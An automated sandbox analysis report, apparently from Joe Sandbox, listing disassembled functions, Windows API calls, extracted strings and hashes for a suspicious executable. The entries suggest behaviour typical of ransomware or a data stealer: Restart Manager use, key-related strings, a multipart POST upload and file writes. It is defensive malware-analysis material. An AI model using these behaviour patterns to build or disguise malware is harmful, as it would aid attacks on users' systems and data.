                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                                                                                            • Instruction ID: 3bf9555b049d395266e132c0daf58a5fb0493706c19f40800d9f76db5439bcc2
                                                                                                                                                                                            • Opcode Fuzzy Hash: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53F0127251102D6B9F09DF64D816CBF7796EF48250B018129FC165B150C631EC70DBD4
APIs
• __EH_prolog3_GS.LIBCMT ref: 0021504A
  • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
• GetNativeSystemInfo.KERNEL32(?,x86,00000000), ref: 00215155
  • Part of subcall function 0020B64E: __EH_prolog3.LIBCMT ref: 0020B655
  • Part of subcall function 0020B07F: __EH_prolog3_GS.LIBCMT ref: 0020B086
  • Part of subcall function 00214DC7: __EH_prolog3_GS.LIBCMT ref: 00214DD1
  • Part of subcall function 00216920: __EH_prolog3_GS.LIBCMT ref: 00216927
  • Part of subcall function 002147EA: __EH_prolog3_GS.LIBCMT ref: 002147F4
  • Part of subcall function 002113E5: __EH_prolog3.LIBCMT ref: 002113EC
  • Part of subcall function 00214CF6: __EH_prolog3_GS.LIBCMT ref: 00214CFD
  • Part of subcall function 002168CD: __EH_prolog3.LIBCMT ref: 002168D4
  • Part of subcall function 00214FCB: __EH_prolog3_GS.LIBCMT ref: 00214FD2
• Sleep.KERNEL32(00000BB8), ref: 002155F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3$InfoNativeSleepSystem
• String ID: !$.txt$/Up$1735725670$789593363246702628$MyApp/1.0$x64$x86
• API String ID: 782859002-2550200081
• Opcode ID: a9f2917305b734fd9a7ad4e9d627ebe83bf4d8a2d630442477f7ffa2d3c37e4c
• Instruction ID: 82bbc99798e5f1894e1f5bb7c6cface69f7cf36c3d5589e3890f37ef0092b969
• Opcode Fuzzy Hash: a9f2917305b734fd9a7ad4e9d627ebe83bf4d8a2d630442477f7ffa2d3c37e4c
• Instruction Fuzzy Hash: 3D028D30D20358EADB15EBA4C95ABEDBBB4AF15300F5040E9E105671C3EB745B98DF62
APIs
• __EH_prolog3_GS.LIBCMT ref: 00206B48
  • Part of subcall function 0021AE24: __EH_prolog3_GS.LIBCMT ref: 0021AE2E
  • Part of subcall function 0020B558: __EH_prolog3.LIBCMT ref: 0020B562
  • Part of subcall function 0020B558: _Func_class.LIBCONCRT ref: 0020B607
  • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
  • Part of subcall function 0020A42C: __EH_prolog3.LIBCMT ref: 0020A433
  • Part of subcall function 0020B41D: __EH_prolog3.LIBCMT ref: 0020B424
• lstrlenA.KERNEL32(?,?), ref: 00206C2D
• GetProcessHeap.KERNEL32 ref: 00206C6A
• HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00206C74
• GetProcessHeap.KERNEL32(00000000,?), ref: 00206CFA
• HeapFree.KERNEL32(00000000), ref: 00206D01
  • Part of subcall function 0020B51E: __EH_prolog3.LIBCMT ref: 0020B525
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3$Heap$H_prolog3_Process$AllocFreeFunc_classlstrlen
• String ID: \key$en_k$os_c
• API String ID: 3880169058-3393669898
• Opcode ID: 90e95ac2383a5bb3f146f9e6e8cf0b186a2f8d761f6bf821d4d84a4c58c5c1ab
• Instruction ID: f70ccfc897323173d6aec1148656b440848810bc613c356568825153e4d7006a
• Opcode Fuzzy Hash: 90e95ac2383a5bb3f146f9e6e8cf0b186a2f8d761f6bf821d4d84a4c58c5c1ab
• Instruction Fuzzy Hash: FC719970D20348EBDF14EBA4DD49BAEBBB4AF46300F504059F505AB292DB701A18CFA2
APIs
• __EH_prolog3_GS.LIBCMT ref: 0021AE2E
  • Part of subcall function 0021ABF2: __EH_prolog3_GS.LIBCMT ref: 0021ABF9
  • Part of subcall function 0021ABF2: ctype.LIBCPMT ref: 0021ACB5
  • Part of subcall function 0020B7BF: __EH_prolog3.LIBCMT ref: 0020B7C6
  • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
  • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
• GetProcessHeap.KERNEL32 ref: 0021AF79
• HeapAlloc.KERNEL32(00000000,00000000,?), ref: 0021AF82
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$Heap$AllocH_prolog3H_prolog3_catch_Processctype
• String ID: 17211235534172093521$18081020163143810973$8780785037186610294$@$Kernel32.dll$ntdll.dll
• API String ID: 614703607-287778538
• Opcode ID: f9534a42ccaf838697f52081e0d56e39f9f291e85f89161e539cfedc23b9ee38
• Instruction ID: cc2e450caa61e659f3c816578dd352b0bd808ce7626c28e539f64aae2e10fa8a
• Opcode Fuzzy Hash: f9534a42ccaf838697f52081e0d56e39f9f291e85f89161e539cfedc23b9ee38
• Instruction Fuzzy Hash: 7C5149B1D1034CEFDB11EFA8C945ADEBBB9AF19344F10406AE404A7281D6705E55CF61
APIs
• type_info::operator==.LIBVCRUNTIME ref: 00222857
• ___TypeMatch.LIBVCRUNTIME ref: 00222965
• _UnwindNestedFrames.LIBCMT ref: 00222AB7
• CallUnexpected.LIBVCRUNTIME ref: 00222AD2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: ,k$$csm$csm$csm
• API String ID: 2751267872-3737283564
• Opcode ID: a13e0ddc9aee0a2a642b6ba00b7cca06aba287c6f9979a01dcf181957afd8aa0
• Instruction ID: 78d0a1e779bc585bd94eebb5185d6439643219e0ad6447b8b8251d26ce2cb9c8
• Opcode Fuzzy Hash: a13e0ddc9aee0a2a642b6ba00b7cca06aba287c6f9979a01dcf181957afd8aa0
• Instruction Fuzzy Hash: 04B15A3182022AFFCF28DFD4E8419AEB7B5FF14310B144559E8116B212D736DA69CFA1
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0021F7D6
• GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0021F7E4
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0021F7F5
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0021F806
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• API String ID: 667068680-1247241052
• Opcode ID: 806412feefc237998a99836d57815faf5ecc8c0d67f5e96149a858473b852800
• Instruction ID: 450d9256cef6ce853176d5c47bad58629a513867760599d7fca4501173ac5831
• Opcode Fuzzy Hash: 806412feefc237998a99836d57815faf5ecc8c0d67f5e96149a858473b852800
• Instruction Fuzzy Hash: 08E012B556A310AF97186F70BC0E88A7EB9FA1F7523015126F415D3160E770445CDF9A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                                                                            • Opcode ID: f254e651d7ba42da03ab8199729059b42e09b761e1f2e273d47e2eb1434fd019
                                                                                                                                                                                            • Instruction ID: 7cc06866881511db28cd15e94d94b14cba947921e058b32309b58a3f5e77eea7
                                                                                                                                                                                            • Opcode Fuzzy Hash: f254e651d7ba42da03ab8199729059b42e09b761e1f2e273d47e2eb1434fd019
                                                                                                                                                                                            • Instruction Fuzzy Hash: 10B124B0E24355AFDB15EF98D842BAD7BB1BF49300F144199E90597382C7B0AE61CF61
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(03371D40,03371D40,?,7FFFFFFF,?,0023EB88,03371D40,03371D40,?,03371D40,?,?,?,?,03371D40,?), ref: 0023E95E
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0023EA19
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0023EAA8
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EAF3
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EAF9
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EB2F
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EB35
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023EB45
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 127012223-0
                                                                                                                                                                                            • Opcode ID: 3a9433195308d5b2b7ac064074809e4a3f6c673935dcebebf3c1f85475a7b450
                                                                                                                                                                                            • Instruction ID: 6c49f142c649bdb2a53f9f9089cccce95cccaa2fb89893041fa4b2a7e2f5d279
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a9433195308d5b2b7ac064074809e4a3f6c673935dcebebf3c1f85475a7b450
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB7117F2A2020A5BDF219E548C41FAFB7BAAF49314F2A0455F805A72C1D771DC38CBA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0021F9DF
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0021FA0B
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0021FA4A
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021FA67
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0021FAA6
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0021FAC3
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021FB05
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0021FB28
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                                                            • Opcode ID: 10c8c402948a6e98991b40ac6e73482989454fb5f67e6f848e055048ccdb7c36
                                                                                                                                                                                            • Instruction ID: 16ee81853fe39c9c411f257a023a8eca2487ee1506957aa6fdbd8b745e3c8fb5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 10c8c402948a6e98991b40ac6e73482989454fb5f67e6f848e055048ccdb7c36
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3051BD7262021AABEF609FA0DD48FEB7BE9EF25754F104035F925E6190D7748DA0CB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                            • Opcode ID: 12cbd57efc24f00b10807126745757f58c8e6f66b67890c3a73c114f1d70c3a1
                                                                                                                                                                                            • Instruction ID: e2ece3b51dd7c363fb48d28b93b867c4f9981616cf4dd9e9fc448609dde1a247
                                                                                                                                                                                            • Opcode Fuzzy Hash: 12cbd57efc24f00b10807126745757f58c8e6f66b67890c3a73c114f1d70c3a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 67B14CB2E203569FDB15DF54CC82BAEBBA5EF16310F144195E904AB382D374E921CBA0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0020667B
                                                                                                                                                                                              • Part of subcall function 00206543: __EH_prolog3_GS.LIBCMT ref: 0020654D
                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00206893
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$DebugOutputString
                                                                                                                                                                                            • String ID: --------$($Content-Type: application/octet-stream; boundary=----$POST
                                                                                                                                                                                            • API String ID: 345087456-2938435220
                                                                                                                                                                                            • Opcode ID: cc8b9744e480a47864bc44daa322ffa30b5f64cd1cedadf7e20ea9ffade005eb
                                                                                                                                                                                            • Instruction ID: f33430b412579ea7fc92080e56c4d37bbc9e69321094ace0a723bb4c008dbed5
                                                                                                                                                                                            • Opcode Fuzzy Hash: cc8b9744e480a47864bc44daa322ffa30b5f64cd1cedadf7e20ea9ffade005eb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B7182B0A102199FEF209F10CD49BAA77B8EF45714F004199FA09A7292DB709E94CF65
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
                                                                                                                                                                                              • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
                                                                                                                                                                                            • RmStartSession.RSTRTMGR(?,00000000,?,?,?,00000000), ref: 0021B3F0
                                                                                                                                                                                              • Part of subcall function 0021ABF2: __EH_prolog3_GS.LIBCMT ref: 0021ABF9
                                                                                                                                                                                              • Part of subcall function 0021ABF2: ctype.LIBCPMT ref: 0021ACB5
                                                                                                                                                                                            • RmRegisterResources.RSTRTMGR(?,00000001,?,00000000,00000000,00000000,00000000), ref: 0021B43F
                                                                                                                                                                                            • RmGetList.RSTRTMGR(?,?,0000000A,?,?), ref: 0021B479
                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0021B493
                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0021B4CF
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0021B4D6
                                                                                                                                                                                            • RmEndSession.RSTRTMGR(?), ref: 0021B4F9
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_Session$CloseCurrentH_prolog3_catch_HandleListObjectProcessRegisterResourcesSingleStartWaitctype
• String ID:
• API String ID: 4225474974-0
• Opcode ID: 80f8344a80c9c2d2c5dfc009d93590a7a95aceb71541b67b8a38385e2a078547
• Instruction ID: 3711bd7d9135403a1a5c1ecbefc14faf8d97428c81d256aac178250e89bb91e1
• Instruction Fuzzy Hash: BC518B71A11218AFDB21DF64CD89ADE7BB8BF16340F4041A9F40AA3582DB349F84CF52
APIs
• _ValidateLocalCookies.LIBCMT ref: 002201D7
• ___except_validate_context_record.LIBVCRUNTIME ref: 002201DF
• _ValidateLocalCookies.LIBCMT ref: 00220268
• __IsNonwritableInCurrentImage.LIBCMT ref: 00220293
• _ValidateLocalCookies.LIBCMT ref: 002202E8
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 240253b9c5ff27b4f3702c5cf29803c76fd48eb5cfcba5c15d25a90612313fb4
• Instruction ID: a4858fc1848becd75b8c0d269c5379e012454b0e359c7372bfef265cbfaec788
• Instruction Fuzzy Hash: 86419834920229FBCF10DFA8D8C4A9E7BB5EF45314F148256EC185B352D735AA25CF90
APIs
• __EH_prolog3.LIBCMT ref: 0021A39A
• std::_Lockit::_Lockit.LIBCPMT ref: 0021A3A7
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0021A3F8
  • Part of subcall function 0021DF22: _Yarn.LIBCPMT ref: 0021DF41
  • Part of subcall function 0021DF22: _Yarn.LIBCPMT ref: 0021DF65
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0021A44A
• std::_Lockit::~_Lockit.LIBCPMT ref: 0021A4D6
Strings
Similarity
• API ID: std::_$Locinfo::_LockitYarn$H_prolog3Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2469272659-1405518554
• Opcode ID: 17261a740056a2038ff8e84bcc63e5d84dc1f6618c53da4988ec7ed0316810a2
• Instruction ID: 1e3c632b4a88b2175af3244c3e8f8d72bf74da0c3155273a0583154e0c37be1a
• Instruction Fuzzy Hash: 4241C471815B84EECB31DFA9D64578AFBF0EF14310F108A6EE08A93A81C7B49A54CF55
Strings
Similarity
• API ID:
• String ID: \#$C:\Users\user\Desktop\OXoeX1Ii3x.exe
• API String ID: 0-3005865697
• Opcode ID: c271204ece687104f70b18b05de1d418e72e27ef64b4f00910f1af6b79c47411
• Instruction ID: d823e03d233bf372e581a7c5b028970e11f2f4d89507f21ef55bd05325a0819b
• Instruction Fuzzy Hash: B921D772620226BFDB52AFE0FE4596B77B9BF013547124534F91597262E770DC208B90
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,07CD655B,?,00231E59,?,?,00000000,?), ref: 00231E0B
Strings
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 6f1e3ab9cf67e27758face875b1fa313cfc5caccec2da53cb99068273c0f02ed
• Instruction ID: 37a47b81027d2fdd3cde41a3a5f9e1da3e2f6704d7ef6c4436324d11e36df8aa
• Instruction Fuzzy Hash: 29212BB5A20225A7C7229F64FC49A5E3768EF437A0F110160F815A72D1E770ED30C6E1
APIs
• __allrem.LIBCMT ref: 00223F1A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00223F36
• __allrem.LIBCMT ref: 00223F4D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00223F6B
• __allrem.LIBCMT ref: 00223F82
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00223FA0
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: c2c21de6e89a5a046325f8e7b47af35d8f050f99e2fc3b5b3c456845d04feeb3
• Instruction ID: 7225c3946d80a06055b0c4ac0ff21a835e4dc01752a92976e3c530509240b72e
• Instruction Fuzzy Hash: 3A8138B1A20722BBE724EFA8EC82B5AB3E9AF44320F144129F515D7691E774DB548F40
APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00217644
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00217679
• SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000), ref: 0021768C
• WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000), ref: 002176A3
• CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002176AA
• CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002176B9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$CloseCreateHandle$PointerWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2606874340-0
                                                                                                                                                                                            • Opcode ID: e43e19a695c682e7119b1946e576daeb14934668038141d01f826d4df314fb68
                                                                                                                                                                                            • Instruction ID: 11ce2704d2f05fae8b568a495bda00d48c6713b2f7594b1c7d682e23627bade4
                                                                                                                                                                                            • Opcode Fuzzy Hash: e43e19a695c682e7119b1946e576daeb14934668038141d01f826d4df314fb68
                                                                                                                                                                                            • Instruction Fuzzy Hash: 35219F71710204AFE7249F6CEC4EFAA77BCFB4A711F040658F116D7290D6B0AC848B60
APIs
• __EH_prolog3.LIBCMT ref: 0021E3C9
• std::_Lockit::_Lockit.LIBCPMT ref: 0021E3D3
  • Part of subcall function 0021A4EA: __EH_prolog3_GS.LIBCMT ref: 0021A4F1
  • Part of subcall function 0021A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0021A502
  • Part of subcall function 0021A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0021A524
• codecvt.LIBCPMT ref: 0021E40D
• std::_Facet_Register.LIBCPMT ref: 0021E424
